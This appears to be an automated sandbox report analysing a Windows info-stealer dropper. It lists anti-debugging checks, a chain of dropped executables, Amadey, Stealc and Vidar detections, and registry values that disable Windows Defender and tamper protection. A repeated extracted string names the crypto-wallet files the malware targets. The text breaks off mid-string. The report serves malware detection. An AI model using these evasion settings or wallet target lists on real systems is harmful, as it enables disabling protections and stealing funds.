Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

Code function: 21_2_04A10D28 rdtsc

21_2_04A10D28

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6A5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6A5FF0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6AC410 LoadLibraryW,GetProcAddress,FreeLibrary,

0_2_6C6AC410

Contains functionality to read the PEB

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_0087652B mov eax, dword ptr fs:[00000030h]	21_2_0087652B
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_0087A302 mov eax, dword ptr fs:[00000030h]	21_2_0087A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0019A302 mov eax, dword ptr fs:[00000030h]	22_2_0019A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_0019652B mov eax, dword ptr fs:[00000030h]	22_2_0019652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0019A302 mov eax, dword ptr fs:[00000030h]	23_2_0019A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0019652B mov eax, dword ptr fs:[00000030h]	23_2_0019652B

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6C67B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C67B1F7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C82AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6C82AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 7988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 9188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 2408, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsHCFBFBAEBK.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsHCFBFBAEBK.exe "C:\Users\user\DocumentsHCFBFBAEBK.exe"
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe "C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe "C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe"

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C874760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C874760

Source: file.exe, file.exe, 00000000.00000002.2547827594.0000000001106000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: CProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C67B341 cpuid

0_2_6C67B341

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1005695001\6fc7e371fe.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6435A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,

0_2_6C6435A0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 23_2_001665E0 LookupAccountNameA,

23_2_001665E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 23_2_001A2517 GetTimeZoneInformation,

23_2_001A2517

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1005697001\a0969106aa.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 22.2.skotes.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.DocumentsHCFBFBAEBK.exe.840000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.skotes.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000002.2646374094.0000000000161000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3287170975.0000000000161000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2626788836.0000000000841000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0000001D.00000003.3027537351.00000000052F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2992599240.000000000167B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2047136566.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2546281725.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2990514987.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000003.2947123671.0000000005430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2849080030.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3071062804.00000000016DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2547238777.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.2800396250.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2849516571.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.3069907329.0000000000C81000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 7988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 9188, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 6fc7e371fe.exe PID: 2408, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 4276, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000E97000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2546281725.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.json
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.2547238777.0000000000DE5000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2547238777.0000000000DB4000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo 